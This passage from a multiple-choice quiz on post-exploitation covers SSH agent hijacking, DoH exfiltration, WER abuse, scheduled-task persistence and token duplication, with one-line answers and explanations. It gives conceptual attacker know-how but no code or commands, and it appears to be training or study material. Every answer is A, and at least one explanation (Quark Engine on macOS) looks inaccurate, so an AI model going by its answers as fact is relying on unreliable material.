A) Hijacking an existing SSH agent session to authenticate without needing credentials
B) Injecting malicious payloads into SSH configuration files
C) Modifying firewall rules to allow SSH brute-force attacks
D) Disabling security monitoring on Linux servers

✅ Answer: A) Hijacking an existing SSH agent session to authenticate without needing credentials
Explanation: SSH Agent Hijacking allows attackers to reuse cached authentication credentials to access remote servers without requiring passwords.

195. What is the primary goal of “IPv6 Tunneling Abuse” in post-exploitation?

A) Bypassing security controls by encapsulating traffic within IPv6 packets
B) Encrypting all network traffic between compromised hosts
C) Modifying DNS records to redirect users to malicious websites
D) Injecting payloads into HTTP headers

✅ Answer: A) Bypassing security controls by encapsulating traffic within IPv6 packets
Explanation: IPv6 Tunneling is used to bypass security appliances that do not properly inspect IPv6 traffic, allowing hidden C2 communications.

196. What is “Quark Engine Bypass” in post-exploitation?

A) Evading Quark Engine malware analysis on macOS
B) Injecting malicious PowerShell scripts into scheduled tasks
C) Exploiting Kerberos authentication vulnerabilities
D) Manipulating web application firewalls to allow SQL injection

✅ Answer: A) Evading Quark Engine malware analysis on macOS
Explanation: Quark Engine Bypass involves modifying execution flow or obfuscating payloads to prevent detection on macOS malware analysis engines.

197. How does “Windows Error Reporting (WER) Abuse” help attackers evade detection?

A) Hijacking Windows Error Reporting services to execute malicious payloads
B) Disabling event logging for failed authentication attempts
C) Injecting payloads into active RDP sessions
D) Encrypting forensic logs to hide evidence

✅ Answer: A) Hijacking Windows Error Reporting services to execute malicious payloads
Explanation: WER Abuse allows attackers to misuse Windows error reporting features to run malicious processes under a trusted system service.

198. What is “DNS Over HTTPS (DoH) Abuse” used for in post-exploitation?

A) Exfiltrating data stealthily by encrypting DNS queries inside HTTPS requests
B) Injecting malicious JavaScript into HTTPS requests
C) Modifying DNS records to redirect network traffic
D) Running brute-force attacks on DNS servers

✅ Answer: A) Exfiltrating data stealthily by encrypting DNS queries inside HTTPS requests
Explanation: DNS Over HTTPS (DoH) Abuse enables attackers to evade network monitoring tools by tunneling malicious traffic inside encrypted DNS requests.

199. How does “Task Scheduler Abuse” help attackers maintain persistence?

A) Creating hidden scheduled tasks to execute malware automatically
B) Modifying system startup scripts to disable antivirus
C) Encrypting the Windows registry to store payloads
D) Injecting PowerShell scripts into system processes

✅ Answer: A) Creating hidden scheduled tasks to execute malware automatically
Explanation: Task Scheduler Abuse allows attackers to schedule malicious processes to execute at set intervals or on system startup, maintaining persistence.

200. What is the purpose of “System Token Duplication” in privilege escalation?

A) Copying a high-privilege security token and using it for unauthorized access
B) Spoofing authentication headers to bypass web security controls
C) Encrypting stolen credentials before exfiltration
D) Injecting payloads into biometric authentication systems

✅ Answer: A) Copying a high-privilege security token and using it for unauthorized access
Explanation: System Token Duplication allows attackers to steal and reuse privileged tokens (e.g., SYSTEM tokens) to escalate privileges without cracking passwords.

Post-Exploitation & Maintaining Access – MCQ Questions